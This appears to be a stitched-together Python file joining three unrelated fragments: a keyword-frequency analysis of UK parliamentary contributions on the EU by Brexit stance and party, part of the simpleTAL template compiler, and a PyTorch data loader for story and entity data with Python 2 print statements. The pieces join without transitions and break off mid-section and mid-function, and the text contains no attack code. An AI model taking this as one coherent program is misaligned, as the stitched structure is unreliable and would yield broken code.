json.dump(kw, out_file)
################################################################################################################################
# KW against all other contributions (not in the window)
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
others = eu_mentions.query("uid not in @in_window.index")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[others.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_everything_else.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW against global self
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
itself = eu_mentions.query("constituency_leave < 50 and ref_stance == 'remain'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[itself.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_vs_global_self.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# EU KW for each group (against non-eu)
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
non_eu = non_eu_mentions.query("date >= @window_start and date <= @window_end")
# Calculate the keywords
kw = dict()
kw["r_con_remainers"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[non_eu.index]).to_dict()
kw["l_con_remainers"] = get_keywords_from_tokens(all_toks.loc[l_con_remainers.index], all_toks.loc[non_eu.index]).to_dict()
kw["leavers"] = get_keywords_from_tokens(all_toks.loc[leavers.index], all_toks.loc[non_eu.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_non_eu.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW of local and global group against Non-EU, Globally
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers_loc = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
r_con_remainers_glo = all_contributions.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
# Calculate the keywords
kw = dict()
kw["local"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers_loc.index], non_eu_toks).to_dict()
kw["global"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers_glo.index], non_eu_toks).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_non_eu_glob.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# Keywords of Leave/Remain in and around the dip of 2018
################################################################################################################################
window_1_start = convert_to_date("2017-11-15 00:00:00")
window_1_end = convert_to_date("2018-01-09 00:00:00")
window_2_start = convert_to_date("2018-01-09 00:00:00")
window_2_end = convert_to_date("2018-05-07 00:00:00")
# Get contributions from the window
in_1st_window = eu_mentions.query("date >= @window_1_start and date <= @window_1_end")
in_2nd_window = eu_mentions.query("date >= @window_2_start and date <= @window_2_end")
remain1 = in_1st_window.query("ref_stance == 'remain'")
leave1 = in_1st_window.query("ref_stance == 'leave'")
remain2 = in_2nd_window.query("ref_stance == 'remain'")
leave2 = in_2nd_window.query("ref_stance == 'leave'")
not_in_dip = eu_mentions.query("date < @window_1_start")
# Calculate the keywords
kw_dip = dict()
kw_dip["remain"] = get_keywords_from_tokens(all_toks.loc[remain1.index], all_toks.loc[not_in_dip.index]).to_dict()
kw_dip["leave"] = get_keywords_from_tokens(all_toks.loc[leave1.index], all_toks.loc[not_in_dip.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2018_ref_dip_kw_v_before.json"), "w") as out_file:
json.dump(kw_dip, out_file)
# Calculate the keywords
kw_dip = dict()
kw_dip["remain"] = get_keywords_from_tokens(all_toks.loc[remain2.index], all_toks.loc[remain1.index]).to_dict()
kw_dip["leave"] = get_keywords_from_tokens(all_toks.loc[leave2.index], all_toks.loc[leave1.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2018_ref_dip_kw_change.json"), "w") as out_file:
json.dump(kw_dip, out_file)
################################################################################################################################
# Keywords of Labour in their 2016 spike
################################################################################################################################
window_start = convert_to_date("2016-02-03 00:00:00")
window_end = convert_to_date("2016-06-29 00:00:00")
# Get contributions from the window
in_window = all_contributions.query("date >= @window_start and date <= @window_end")
lab = in_window.query("party == 'Labour'")
not_in_window = all_contributions.query("date < @window_start or date > @window_end")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[lab.index], all_toks.loc[not_in_window.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "labour_kw_peak.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# EU Keywords of Lab/Con in their unpredictability dip of 2019
################################################################################################################################
window_1_start = convert_to_date("2019-02-20 00:00:00")
window_1_end = convert_to_date("2019-04-08 00:00:00")
window_2_start = convert_to_date("2019-04-08 00:00:00")
window_2_end = convert_to_date("2019-10-07 00:00:00")
# Get contributions from the window
in_1st_window = eu_mentions.query("date >= @window_1_start and date <= @window_1_end")
in_2nd_window = eu_mentions.query("date >= @window_2_start and date <= @window_2_end")
lab1 = in_1st_window.query("party == 'Labour'")
con1 = in_1st_window.query("party == 'Conservative'")
lab2 = in_2nd_window.query("party == 'Labour'")
con2 = in_2nd_window.query("party == 'Conservative'")
not_in_dip = eu_mentions.query("date < @window_1_start")
# Calculate the keywords
kw_dip = dict()
kw_dip["lab"] = get_keywords_from_tokens(all_toks.loc[lab1.index], all_toks.loc[not_in_dip.index]).to_dict()
kw_dip["con"] = get_keywords_from_tokens(all_toks.loc[con1.index], all_toks.loc[not_in_dip.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2019_party_dip_kw_v_before.json"), "w") as out_file:
json.dump(kw_dip, out_file)
# Calculate the keywords
kw_dip = dict()
kw_dip["lab"] = get_keywords_from_tokens(all_toks.loc[lab2.index], all_toks.loc[lab1.index]).to_dict()
kw_dip["con"] = get_keywords_from_tokens(all_toks.loc[con2.index], all_toks.loc[con1.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2019_party_dip_kw_change.json"), "w") as out_file:
json.dump(kw_dip, out_file)
################################################################################################################################
# Keywords of Leave/Remain in their 2018 change against previous windows.
################################################################################################################################
window_start = convert_to_date("2018-01-09 00:00:00")
window_end = convert_to_date("2018-05-17 00:00:00")
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
attProps = argument.split (' ')
if (len (attProps) < 2):
# Error, badly formed repeat command
msg = "Badly formed repeat command '%s'. Repeat commands must be of the form: 'localVariable path'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
varName = attProps [0]
expression = " ".join (attProps[1:])
return (TAL_REPEAT, (varName, expression, self.endTagSymbol))
def compileCmdContent (self, argument, replaceFlag=0):
# Compile a content command, resulting argument is
# (replaceFlag, structureFlag, expression, endTagSymbol)
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! content/replace commands must be of the form: 'path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
structureFlag = 0
attProps = argument.split (' ')
if (len(attProps) > 1):
if (attProps[0] == "structure"):
structureFlag = 1
express = " ".join (attProps[1:])
elif (attProps[1] == "text"):
structureFlag = 0
express = " ".join (attProps[1:])
else:
# It's not a type selection after all - assume it's part of the path
express = argument
else:
express = argument
return (TAL_CONTENT, (replaceFlag, structureFlag, express, self.endTagSymbol))
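# Sketch of the keyword handling above (TAL semantics; the paths are
# illustrative):
#
#   tal:content="structure page/body"  -> structureFlag=1, expression "page/body"
#   tal:content="text page/title"      -> structureFlag=0, expression "page/title"
#   tal:content="page/title"           -> treated as a plain path expression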
def compileCmdReplace (self, argument):
return self.compileCmdContent (argument, replaceFlag=1)
def compileCmdAttributes (self, argument):
# Compile tal:attributes into attribute command
# Argument: [(attributeName, expression)]
# Break up the list of attribute settings first
commandArgs = []
# We only want to match semi-colons that are not escaped
argumentSplitter = re.compile ('(?<!;);(?!;)')
for attributeStmt in argumentSplitter.split (argument):
# remove any leading space and un-escape any semi-colons
attributeStmt = attributeStmt.lstrip().replace (';;', ';')
# Break each attributeStmt into name and expression
stmtBits = attributeStmt.split (' ')
if (len (stmtBits) < 2):
# Error, badly formed attributes command
msg = "Badly formed attributes command '%s'. Attributes commands must be of the form: 'name expression[;name expression]'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
attName = stmtBits[0]
attExpr = " ".join (stmtBits[1:])
commandArgs.append ((attName, attExpr))
return (TAL_ATTRIBUTES, commandArgs)
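# The (?<!;);(?!;) splitter above treats ';;' as an escaped literal
# semi-colon. A sketch (attribute names and paths are illustrative):
#
#   tal:attributes="href string:a;;b; title page/title"
#   # splits into two statements:
#   #   ('href',  'string:a;b')
#   #   ('title', 'page/title')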
def compileCmdOmitTag (self, argument):
# Compile a condition command, resulting argument is:
# path
# If no argument is given then set the path to default
if (len (argument) == 0):
expression = "default"
else:
expression = argument
return (TAL_OMITTAG, expression)
# METAL compilation commands go here
def compileMetalUseMacro (self, argument):
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! use-macro commands must be of the form: 'use-macro: path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
cmnd = (METAL_USE_MACRO, (argument, {}, self.endTagSymbol))
self.log.debug ("Returning METAL_USE_MACRO: %s" % str (cmnd))
return cmnd
def compileMetalDefineMacro (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! define-macro commands must be of the form: 'define-macro: name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the macro is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Macro name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
if (argument in self.macroMap):
msg = "Macro name %s is already defined!" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# The macro starts at the next command.
macro = SubTemplate (len (self.commandList), self.endTagSymbol)
self.macroMap [argument] = macro
return None
def compileMetalFillSlot (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! fill-slot commands must be of the form: 'fill-slot: name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the macro is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Determine what use-macro statement this belongs to by working through the list backwards
ourMacroLocation = None
location = len (self.tagStack) - 1
while (ourMacroLocation is None):
macroLocation = self.tagStack[location][2]
if (macroLocation is not None):
ourMacroLocation = macroLocation
else:
location -= 1
if (location < 0):
msg = "metal:fill-slot must be used inside a metal:use-macro call"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Get the use-macro command we are going to adjust
cmnd, args = self.commandList [ourMacroLocation]
self.log.debug ("Use macro argument: %s" % str (args))
macroName, slotMap, endSymbol = args
# Check that the name of the slot is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
if (argument in slotMap):
msg = "Slot %s has already been filled!" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# The slot starts at the next command.
slot = SubTemplate (len (self.commandList), self.endTagSymbol)
slotMap [argument] = slot
# Update the command
self.commandList [ourMacroLocation] = (cmnd, (macroName, slotMap, endSymbol))
return None
def compileMetalDefineSlot (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! define-slot commands must be of the form: 'name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the slot is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
return (METAL_DEFINE_SLOT, (argument, self.endTagSymbol))
class TemplateParseException (Exception):
def __init__ (self, location, errorDescription):
self.location = location
self.errorDescription = errorDescription
def __str__ (self):
return "[" + self.location + "] " + self.errorDescription
class HTMLTemplateCompiler (TemplateCompiler, FixedHTMLParser.HTMLParser):
def __init__ (self):
TemplateCompiler.__init__ (self)
FixedHTMLParser.HTMLParser.__init__ (self)
self.log = logging.getLogger ("simpleTAL.HTMLTemplateCompiler")
def parseTemplate (self, file, minimizeBooleanAtts = False):
self.minimizeBooleanAtts = minimizeBooleanAtts
self.feed (file.read())
self.close()
def tagAsText (self, tagObj, singletonFlag=0):
""" This returns a tag as text.
"""
tag,atts = tagObj
result = ["<"]
result.append (tag)
upperTag = tag.upper()
for attName, attValue in atts:
if (self.minimizeBooleanAtts and '%s:%s' % (upperTag, attName.upper()) in HTML_BOOLEAN_ATTS):
# We should output a minimised boolean value
result.append (' ')
result.append (attName)
else:
result.append (' ')
result.append (attName)
result.append ('="')
result.append (html.escape (attValue, quote=1))
result.append ('"')
if (singletonFlag):
result.append (" />")
else:
result.append (">")
return "".join (result)
def handle_startendtag (self, tag, attributes):
self.handle_starttag (tag, attributes)
if not (tag.upper() in HTML_FORBIDDEN_ENDTAG):
self.handle_endtag(tag)
def handle_starttag (self, tag, attributes):
self.log.debug ("Received Start Tag: " + tag + " Attributes: " + str (attributes))
atts = []
for att, attValue in attributes:
# We need to spot empty tal:omit-tags
if (attValue is None):
if (att == self.tal_namespace_omittag):
atts.append ((att, ""))
else:
atts.append ((att, att))
elif not HTML_ENTITIES_PRE_EXPANDED:
# Expand any SGML entity references or char references
goodAttValue = []
last = 0
match = ENTITY_REF_REGEX.search (attValue)
while (match):
goodAttValue.append (attValue[last:match.start()])
ref = attValue[match.start():match.end()]
if (ref.startswith ('&#')):
# A char reference
if (ref[2] in ['x', 'X']):
# Hex
refValue = int (ref[3:-1], 16)
else:
refValue = int (ref[2:-1])
goodAttValue.append (chr (refValue))
else:
# A named reference.
goodAttValue.append (chr (sgmlentitynames.htmlNameToUnicodeNumber.get (ref[1:-1], 65533)))
last = match.end()
match = ENTITY_REF_REGEX.search (attValue, last)
goodAttValue.append (attValue [last:])
atts.append ((att, "".join (goodAttValue)))
else:
atts.append ((att, attValue))
if (tag.upper() in HTML_FORBIDDEN_ENDTAG):
# This should have no end tag, so we just do the start and suppress the end
self.parseStartTag (tag, atts)
self.log.debug ("End tag forbidden, generating close tag with no output.")
self.popTag ((tag, None), omitTagFlag=1)
else:
self.parseStartTag (tag, atts)
def handle_endtag (self, tag):
self.log.debug ("Recieved End Tag: " + tag)
if (tag.upper() in HTML_FORBIDDEN_ENDTAG):
self.log.warning ("HTML 4.01 forbids end tags for the %s element" % tag)
else:
# Normal end tag
self.popTag ((tag, None))
def handle_data (self, data):
self.parseData (html.escape (data, quote=False))
# These two methods are required so that we expand all character and entity references prior to parsing the template.
def handle_charref (self, ref):
self.log.debug ("Got Ref: %s", ref)
self.parseData (chr (int (ref)))
def handle_entityref (self, ref):
self.log.debug ("Got Ref: %s", ref)
# Use handle_data so that <&> are re-encoded as required.
self.handle_data( chr (sgmlentitynames.htmlNameToUnicodeNumber.get (ref, 65533)))
# Handle document type declarations
def handle_decl (self, data):
self.parseData ('<!%s>' % data)
# Pass comments through un-affected.
def handle_comment (self, data):
self.parseData ('<!--%s-->' % data)
def handle_pi (self, data):
self.log.debug ("Recieved processing instruction.")
self.parseData ('<?%s>' % data)
def report_unbalanced (self, tag):
self.log.warning ("End tag %s present with no corresponding open tag.")
def getTemplate (self):
template = HTMLTemplate (self.commandList, self.macroMap, self.symbolLocationTable, minimizeBooleanAtts = self.minimizeBooleanAtts)
return template
class XMLTemplateCompiler (TemplateCompiler, xml.sax.handler.ContentHandler, xml.sax.handler.DTDHandler, LexicalHandler):
def __init__ (self):
TemplateCompiler.__init__ (self)
xml.sax.handler.ContentHandler.__init__ (self)
self.doctype = None
self.log = logging.getLogger ("simpleTAL.XMLTemplateCompiler")
self.singletonElement = 0
def parseTemplate (self, templateFile):
self.ourParser = xml.sax.make_parser()
self.log.debug ("Setting features of parser")
try:
self.ourParser.setFeature (xml.sax.handler.feature_external_ges, False)
self.log.debug ("Set SAX Handler feature OK")
except:
pass
if use_lexical_handler:
self.ourParser.setProperty(xml.sax.handler.property_lexical_handler, self)
self.ourParser.setContentHandler (self)
self.ourParser.setDTDHandler (self)
self.ourParser.parse (templateFile)
def startDTD(self, name, public_id, system_id):
self.log.debug ("Recieved DOCTYPE: " + name + " public_id: " + public_id + " system_id: " + system_id)
if public_id:
self.doctype = '<!DOCTYPE %s PUBLIC "%s" "%s">' % (name, public_id, system_id,)
else:
self.doctype = '<!DOCTYPE %s SYSTEM "%s">' % (name, system_id,)
def startElement (self, tag, attributes):
self.log.debug ("Recieved Real Start Tag: " + tag + " Attributes: " + str (attributes))
try:
xmlText = self.ourParser.getProperty (xml.sax.handler.property_xml_string)
if (isinstance (xmlText, str)):
# Once issue 6686 is solved this should allow singletons to be detected
if (SINGLETON_XML_REGEX.match (xmlText)):
# This is a singleton!
self.singletonElement=1
else:
if (SINGLETON_BYTES_XML_REGEX.match (xmlText)):
# This is a singleton!
self.singletonElement = 1
except xml.sax.SAXException as e:
# Parser doesn't support this property
pass
# Convert attributes into a list of tuples
atts = []
for att in attributes.getNames():
self.log.debug ("Attribute name %s has value %s" % (att, attributes[att]))
atts.append ((att, attributes [att]))
self.parseStartTag (tag, atts, singletonElement=self.singletonElement)
def endElement (self, tag):
self.log.debug ("Recieved Real End Tag: " + tag)
self.parseEndTag (tag)
self.singletonElement = 0
def skippedEntity (self, name):
self.log.info ("Recieved skipped entity: %s" % name)
self.characters( chr (sgmlentitynames.htmlNameToUnicodeNumber.get (name, 65533)))
def characters (self, data):
#self.log.debug ("Recieved Real Data: " + data)
# Escape any data we recieve - we don't want any: <&> in there.
self.parseData (html.escape (data, quote=False))
def processingInstruction (self, target, data):
self.log.debug ("Recieved processing instruction.")
self.parseData ('<?%s %s?>' % (target, data))
def comment (self, data):
# This is only called if your XML parser supports the LexicalHandler interface.
self.parseData ('<!--%s-->' % data)
self.sent[split][key] = \
torch.LongTensor(sent).unsqueeze(0)
self.ctx[split][key] = \
torch.LongTensor(ctx).unsqueeze(0)
self.labels[split][key] = \
torch.FloatTensor(labels).unsqueeze(0)
self.sent_lengths[split][key] = \
torch.LongTensor([sl])
self.ctx_lengths[split][key] = \
torch.LongTensor([cl])
self.ids[split][key] = [id_]
else:
self.sent[split][key] = torch.cat(
[self.sent[split][key],
torch.LongTensor(sent).unsqueeze(0)], 0)
self.ctx[split][key] = torch.cat(
[self.ctx[split][key],
torch.LongTensor(ctx).unsqueeze(0)], 0)
self.labels[split][key] = torch.cat(
[self.labels[split][key],
torch.FloatTensor(labels).unsqueeze(0)], 0)
self.sent_lengths[split][key] = torch.cat(
[self.sent_lengths[split][key],
torch.LongTensor([sl])], 0)
self.ctx_lengths[split][key] = torch.cat(
[self.ctx_lengths[split][key],
torch.LongTensor([cl])], 0)
self.ids[split][key] += [id_]
self.raw[split][id_] = self.raw[split].get(id_, []) + [raw_sent]
self.raw_labels[split][id_] = raw_labels
self.size[split][key] = self.size[split].get(key, 0) + 1
# If you only have a development set, but want to train on a part of it,
# split the dev set into a training/dev split, using t_ratio of the dev
# set for training and keeping the remainder for evaluation
def split_set(self, t_ratio=0.8, keep="dev", write="train"):
self.labels[write] = {}
self.sent[write] = {}
self.ctx[write] = {}
self.sent_lengths[write] = {}
self.ctx_lengths[write] = {}
self.ids[write] = {}
self.size[write] = {}
self.raw_labels[write] = {}
self.raw[write] = {}
keep_vals, write_vals = self.get_splits(keep, t_ratio)
for key in self.size[keep]:
if write_vals:
self.update_sets(write_vals[key], write, keep, key)
if keep_vals:
self.update_sets(keep_vals[key], keep, keep, key)
self.offset[write] = {i: 0 for i in self.labels[write]}
self.unfilled[write] = set(self.offset[write].keys())
self.offset[keep] = {i: 0 for i in self.labels[keep]}
self.unfilled[keep] = set(self.offset[keep].keys())
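# Hedged usage sketch: with only a dev set loaded, carve 80% of it into a
# synthetic training split and keep the rest as dev (get_splits is assumed
# here to return per-key index lists in that proportion):
#
#   loader.split_set(t_ratio=0.8, keep="dev", write="train")
#   # loader.sent["train"][key] now holds ~80% of the rows that were in
#   # loader.sent["dev"][key]; offsets for both splits are reset to 0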
def update_sets(self, vals, write, keep, key):
idxs = torch.LongTensor(vals)
if self.is_cuda:
idxs = idxs.cuda()
self.labels[write][key] = \
self.labels[keep][key].index_select(0, idxs)
self.sent[write][key] = \
self.sent[keep][key].index_select(0, idxs)
self.ctx[write][key] = \
self.ctx[keep][key].index_select(0, idxs)
self.sent_lengths[write][key] = \
self.sent_lengths[keep][key].index_select(0, idxs)
self.ctx_lengths[write][key] = \
self.ctx_lengths[keep][key].index_select(0, idxs)
p = [self.ids[keep][key][i] for i in idxs]
self.size[write][key] = len(idxs)
self.raw[write].update({id_: self.raw[keep][id_] for
id_ in p})
self.raw_labels[write].update({id_: self.raw_labels[keep][id_] for
id_ in p})
self.ids[write][key] = p
def sample_keys(self, split):
return random.sample(self.unfilled[split], 1)[0]
def shuffle_sequences(self, split, keys):
orders = {}
for key in keys:
ex_order = torch.LongTensor(
range(self.labels[split][key].size(0)))
if self.is_cuda:
ex_order = ex_order.cuda()
random.shuffle(ex_order)
orders[key] = ex_order
self.labels[split][key] = \
self.labels[split][key].index_select(0, ex_order)
self.sent[split][key] = \
self.sent[split][key].index_select(0, ex_order)
self.ctx[split][key] = \
self.ctx[split][key].index_select(0, ex_order)
self.sent_lengths[split][key] = \
self.sent_lengths[split][key].index_select(0, ex_order)
self.ctx_lengths[split][key] = \
self.ctx_lengths[split][key].index_select(0, ex_order)
self.ids[split][key] = [self.ids[split][key][i]
for i in ex_order]
return orders
# keyss should be a list of keys to reset
def reset_offsets(self, split=None, shuffle=True):
def reset_offset(split, keyss):
for keys in keyss:
if keys in self.offset[split]:
self.offset[split][keys] = 0
else:
print "keys not in offset"
self.unfilled[split] = \
self.unfilled[split].union(keyss)
if not split:
splits = self.splits
else:
splits = [split]
orders = {}
for split in splits:
keyss = self.offset[split].keys()
if shuffle:
orders[split] = \
self.shuffle_sequences(split, keyss)
reset_offset(split, keyss)
return orders
def sample_batches(self, split, keys=None, bs=None):
# If specific key isn't specified, sample a key
if not keys:
keys = self.sample_keys(split)
if not bs:
bs = self.batch_size
offset = self.offset[split]
# Choose sequences to batch
start_idx = offset[keys]
final_idx = offset[keys] + bs
num_sentences = self.sent[split][keys].size(0)
labels = self.labels[split][keys]
sentence = self.sent[split][keys]
sentence_lengths = self.sent_lengths[split][keys]
context = self.ctx[split][keys]
context_lengths = self.ctx_lengths[split][keys]
ids = self.ids[split][keys]
# Check if final index is greater than number of sequences
if final_idx < num_sentences:
idx_range = range(start_idx, final_idx)
idxs = torch.LongTensor(idx_range)
# Update offset for next access of this key
self.offset[split][keys] += bs
else:
# If it is, take a subset of the self.batch_size
idx_range = range(start_idx, num_sentences)
idxs = torch.LongTensor(idx_range)
self.offset[split][keys] = 0
if keys in self.unfilled[split]:
# This key has been visited completely
self.unfilled[split].remove(keys)
if self.is_cuda:
idxs = idxs.cuda(cfg.device)
ss = sentence.index_select(0, idxs)
sl = sentence_lengths.index_select(0, idxs)
cs = context.index_select(0, idxs)
cl = context_lengths.index_select(0, idxs)
lab = labels.index_select(0, idxs)
idss = ids[idx_range[0]:idx_range[-1] + 1]
return lab, ss, sl, cs, cl, None, None, None, idss, keys
def cuda(self, device_id=None):
if device_id is None:
device_id = cfg.device
for split in self.sent.keys():
for key in self.sent[split].keys():
self.sent[split][key] = \
self.sent[split][key].cuda(device_id)
self.sent_lengths[split][key] = \
self.sent_lengths[split][key].cuda(device_id)
self.ctx[split][key] = \
self.ctx[split][key].cuda(device_id)
self.ctx_lengths[split][key] = \
self.ctx_lengths[split][key].cuda(device_id)
self.labels[split][key] = \
self.labels[split][key].cuda(device_id)
self.is_cuda = True
class MemoryModelDataLoader(NeuralModelDataLoader):
def __init__(self, opt=None, batch_size=32):
super(MemoryModelDataLoader, self).__init__(opt, batch_size)
self.is_ren = True
def do_context(self, ctx_, char_lines, line_num):
# Place context lines for a story sentence in a dictionary
# where each key is the order of the sentence
ctx = {}
for line in range(len(ctx_)):
if line < line_num:
ctx[line + 1] = [self.vocabs["sentence"][i]
for i in ctx_[line]]
return ctx
# ent_ments is entities mentioned in every line
# num_ents is the entity identity
def do_entities(self, ent_ments, num_ents):
elabel = {}
eids = [0] * len(num_ents)
# Get entity ids from vocab
for ent, idx in num_ents.iteritems():
if ent.lower() not in self.vocabs["entity"]._index:
print ent.lower()
eids[idx] = self.vocabs["entity"][ent.lower()]
# Get entity labels at each step for
# additional supervision
for i in range(1, 6):
ent_list = ent_ments.get(i, [])
elabel[i] = [0] * len(num_ents)
for ent in ent_list:
elabel[i][num_ents[ent]] = 1
return eids, elabel
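# Worked example of the shapes above (the entity names are illustrative):
#
#   num_ents = {'John': 0, 'Mary': 1}
#   ent_ments = {1: ['John'], 2: ['John', 'Mary']}
#   eids, elabel = self.do_entities(ent_ments, num_ents)
#   # eids   -> vocab ids for ['john', 'mary']
#   # elabel -> {1: [1, 0], 2: [1, 1], 3: [0, 0], 4: [0, 0], 5: [0, 0]}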
def do_row(self, row, ents, ent_ments, num_ents,
split, counter, same_row=None):
# Find entity in entity file
story = row["storyid"]
char = row["char"]
line_num = row["linenum"]
# Extract sentences and context
raw_sent = lit_eval(row["sentence"])
ctx_ = ctx_lit_eval(row["context"])
# Find the lines in the story in which this character appears
char_lines = ents[(story, char)]
# Get previous sentences to make context data structure
ctx = self.do_context(ctx_, char_lines, line_num)
# Get entities
eids, elabels = self.do_entities(ent_ments, num_ents)
# Get context and sentence
sent = [self.vocabs["sentence"][i] for i in raw_sent]
# Get story id_
if same_row is not None:
id_ = (story, char, line_num)
else:
counter.setdefault((story, char, line_num), 0)
id_ = (story, char, line_num, counter[(story, char, line_num)])
counter[(story, char, line_num)] += 1
# Get sentence lengths
sl = len(sent)
sent_diff = self.sent_maxes[split] - sl
sent += [0] * sent_diff
# Get context lengths
clengths = {}
for i in ctx:
clengths[i] = len(ctx[i])
ctx_diff = self.ctx_maxes[split][i - 1] - clengths[i]
ctx[i] += [0] * ctx_diff
# Get labels for this point
labels, raw_labels = self.make_label_point(row, same_row)
# Make the key for the group this data point belongs to
key = (line_num, len(num_ents))
# Add the example to all the corresponding data stores
# for each part of the data point (sentence, labels, context, etc.)
if key not in self.sent[split]:
self.sent[split][key] = \
torch.LongTensor(sent).unsqueeze(0)
self.labels[split][key] = \
torch.FloatTensor(labels).unsqueeze(0)
self.sent_lengths[split][key] = \
torch.LongTensor([sl])
self.ent[split][key] = \
torch.LongTensor([num_ents[char]])
self.ent_init[split][key] = \
torch.LongTensor(eids).unsqueeze(0)
self.ids[split][key] = [id_]
self.ctx[split][key] = {}
self.ctx_lengths[split][key] = {}
self.ent_labels[split][key] = {}
for i in range(1, key[0]):
self.ctx[split][key][i] = \
torch.LongTensor(ctx[i]).unsqueeze(0)
self.ctx_lengths[split][key][i] = \
torch.LongTensor([clengths[i]])
self.ent_labels[split][key][i] = \
torch.FloatTensor([elabels[i]])
self.ent_labels[split][key][key[0]] = \
torch.FloatTensor([elabels[key[0]]])
else:
self.sent[split][key] = torch.cat(
[self.sent[split][key],
torch.LongTensor(sent).unsqueeze(0)], 0)
self.labels[split][key] = torch.cat(
[self.labels[split][key],
torch.FloatTensor(labels).unsqueeze(0)], 0)
self.sent_lengths[split][key] = torch.cat(
[self.sent_lengths[split][key],
torch.LongTensor([sl])], 0)
self.ent[split][key] = torch.cat(
[self.ent[split][key],
torch.LongTensor([num_ents[char]])], 0)
self.ent_init[split][key] = torch.cat(
[self.ent_init[split][key],
torch.LongTensor(eids).unsqueeze(0)], 0)
for i in range(1, key[0]):
# try:
self.ctx[split][key][i] = torch.cat(
[self.ctx[split][key][i],
torch.LongTensor(ctx[i]).unsqueeze(0)], 0)
self.ctx_lengths[split][key][i] = torch.cat(
[self.ctx_lengths[split][key][i],
torch.LongTensor([clengths[i]])], 0)
self.ent_labels[split][key][i] = torch.cat(
[self.ent_labels[split][key][i],
torch.FloatTensor([elabels[i]])], 0)
self.ent_labels[split][key][key[0]] = torch.cat(
[self.ent_labels[split][key][key[0]],
torch.FloatTensor([elabels[key[0]]])], 0)
self.ids[split][key] += [id_]
self.raw[split][id_] = self.raw[split].get(id_, []) + [raw_sent]
self.raw_labels[split][id_] = raw_labels
self.size[split][key] = self.size[split].get(key, 0) + 1
# Sample a batch from the data_loader
def sample_batches(self, split, keys=None, bs=None):
# If specific key isn't specified, sample a key
if not keys:
keys = self.sample_keys(split)
if not bs:
bs = self.batch_size
offset = self.offset[split]
# Choose sequences to batch
start_idx = offset[keys]
final_idx = offset[keys] + bs
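# Note: sampling is sequential within each key; self.offset records how far
# into this key's examples previous calls have already read.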
# Cache the correct data stores
num_sentences = self.sent[split][keys].size(0)
labels = self.labels[split][keys]
sentence = self.sent[split][keys]
sentence_lengths = self.sent_lengths[split][keys]
context = self.ctx[split][keys]
context_lengths = self.ctx_lengths[split][keys]
ent = self.ent[split][keys]
ent_init = self.ent_init[split][keys]
ent_labels = self.ent_labels[split][keys]
